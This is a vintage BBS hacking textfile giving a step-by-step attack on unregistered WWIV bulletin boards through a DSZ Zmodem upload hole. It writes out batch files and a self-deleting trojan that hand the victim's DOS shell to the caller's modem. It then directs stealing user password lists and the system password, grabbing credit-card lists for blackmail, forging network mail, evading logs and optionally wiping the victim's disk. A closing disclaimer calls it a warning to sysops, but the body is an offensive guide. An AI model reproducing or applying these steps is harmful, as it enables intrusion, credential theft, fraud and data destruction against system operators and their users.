                                                                             
                                                                            
                       Hacking into WWIV, Second Edition                  
                                                                          
                                 by Vision                                
                                                                           
WWIV, when unmodified and when not using external chains/protocols/programs,
is essentially impregnable.  However, good ol' Wayne Bell has also distributed
the source code, external network programs, protocol support, and other nifty
benefits that have made life for a WWIV hack much easier.  This textfile will
describe the essentials of hacking into WWIV via a hole in unregister.
The key here is >unregistered<, since this hack works through DSZ's refusal to
reroute Zmodem-batch downloads without registration.
                                                                        
Step One:                                                                 
                                                                            
Call your local WWIV startup under a false alias.  They are usually struggling
and haven't had the time to 'register' DSZ with PUTSNP or register their
source so they can patch this hole.  You need to find out what COM port they
are operating on.  Once you do this, create several files:                  
                                                                         
      a) DLZ.BAT - this should read:                                   
                CLS                                     
                CTTY CON                                                
                DSZ port1 speed2400 sz %1                        
                CTTY COM1                                                
                CLS                                                

         Substituting, of course, the correct COM port.  This will allow
         you to download files remotely via Zmodem.                        
                                                                        
      b) HACK.BAT - this should read:                        
                CTTY COM1                                                
                COMMAND                                                
                                                                        
         Again, if the SysOp is running from another COMport, substitute the
         correct number.  This will turn over control of the computer to
         whatever device is on COM1 (the modem) and run the command
         interpreter.                                                
                                                                        
      c) NETWORK.COM - the QuickBASIC source for this is:
                SHELL "DEL NETWORK.COM"                        
                SHELL "HACK.BAT"                        
         Compile & link it to NETWORK.EXE then rename it to NETWORK.COM.  This
         will delete itself and run HACK.BAT.  If you want, right it in Pascal
         or C, but it's not going to make any difference.
                                                                        
Step Two:                                                                   
                                                                        
Call back and go straight to the transfer section.  Upload (to any directory,
or directly to the SysOp).  When prompted for the file name, enter
"????????.???" (eight ?'s then three ?'s, without the quotes).  You'll see
the Zmodem receive string.  Upload one of the above files.  The BBS will
say, "transfer aborted"... but you know better!  Repeat until all files
have been uploaded.                                                
                                                                        
Step Three:                                                                 
Call back very shortly afterwards (thirty seconds, no more, no less).  When
you get the "NN:" prompt, enter "!-@NETWORK@-!" (again, no quotes).  This
will access the unpassworded WWIVnet account (the password routines are
external).  When the BBS sees this, it will drop to DOS and run
NETWORK.EXE.                                                                
    However, since COMs are run before EXEs, your NETWORK.COM will be executed
    promptly turning control over to you via HACK.BAT!  Now that you are in
    promptly turning control over to you via HACK.BAT!  Now that you are in
    DOS, there are a few things that you must immediately do.
                                                                        
Step Four:
                                                                        
Use DLZ.BAT to leech the target's CONFIG.DAT from his main BBS directory (the
one you were dumped in when you arrived).  The format is:
                                                                        
        DLZ <filename>                                                
                                                                        
  where <filename> is the name of the file.  For example,                     
                                                                        
        DLZ CONFIG.DAT                                                
                                                                        
   will leech the configuration file.                                       
                                                                        
Step Five:                                                
                                                                        
Go to his BBS DATA directory.  This is usually C:\WWIV\DATA, but you might
have to look around a little bit.  When you find it, use DLZ to leech the
target's USER.LST.  Using Norton Utilities or any hex and/or text editor, it
is very easy to see where the usernames and their passwords are stored.
                                                                        
Step Six:
                                                                        
If the target is in WWIVnet or WWIVlink, download his/her CALLOUT.NET file fro
 the aforementioned data directory.  This will be explained later.
                                                                        
Step Seven:                                                                 
                                                                        
Delete HACK.BAT if you haven't already!
                                                                        
Step Eight:
                                                                        
Look around.  Leech anything that looks interesting.  This includes:
                                                                        
           > Private G-Files from the G-File section
Good for __/ Lists of credit-card or calling-card numbers
blackmail  \ Pirate files
         --> His dialing directories from Telemate or Telix; these usually
              contain passwords and numbers of private BBS's!
                                                                        
Step Nine:                                                                  
                                                                        
Hang up.  If you really hate him, upload Norton's WIPEDISK.EXE along with the
rest of the files, run it, and permanently destroy all data on his drive.
This is generally not recommended, because so far he has NO WAY of knowing
you were in unless he watched.                                                
                                                                        
---------                                                
Tips:                                                                        
---------                                                                 
                                                                        
        a) In the target's logs, nothing will show except that you hit 'U'
           when you were online and quit before the upload started.  This is
           virtually always overlooked, and logs more than two days old are
           usually deleted.                                                
                                                                        
        b) In the target's net logs, he'll probably see a >NO NET<, which is
            rather common.                                                
                                                                        
        c) Very close to the beginning of CONFIG.DAT and right before the
           first directory entry (usually "MSGS\") you will find the target's
           SYSTEM PASSWORD.  This is needed if you are going to log on as
           him or a remote sysop.                        
                                                                        
        d) If a sysop logs on, it is not noted in the LAST FEW CALLERS screen
           OR the logs.                                                
                                                                        
        e) A few commands that you will want to try out when you are online as
           #1 are:                                                
                                                                        
                //DOS                                                
                //UEDIT                                                
                //BOARDEDIT                                                
                //DIREDIT                                                
                //GFILEEDIT                                                
                //CHUSER                                                
                                                                        
             Most require the system password, but if you're online as the
             sysop you already have that.                                    
                                                                        
        f) You can have great fun with planted and rouge mailing if you have
           a copy of WWIV and the victim's CALLOUT.NET.  CALLOUT.NET has a
           little note after every entry that looks something like:
                                                                        
                "KAOIYQIGNADFUKG"                                          
                                                                        
            Or another random password.  Read WWIVTECH.DOC.
               (available on most WWIV boards) for more information.  You
                should be able to pick up/drop off mail supposedly from and
                to your target very easily for about a week.  When you start
                getting >BAD PASSWORD<, get back into your victim's DOS
                and get the passwords again!
                                                                        
        g) You should be able to figure out what to do with the password file.
                                                                        
        h) NEVER, NEVER, NEVER press backspace when there is nothing to
           backspace!  This will have catastophic effects and will definintel
           crash CTTY!                                                
                                                                        
        i) This file is provided to inform WWIV sysops of this threat.  If
           somebody uses it for "bad" purposes, it is not my fault.
                                                                        
Later!                                                                        
                          \        /
                       <=---\----/--i--s--i--o--n---=>                        
                              \/                       Re-Edit by  Silver Sword



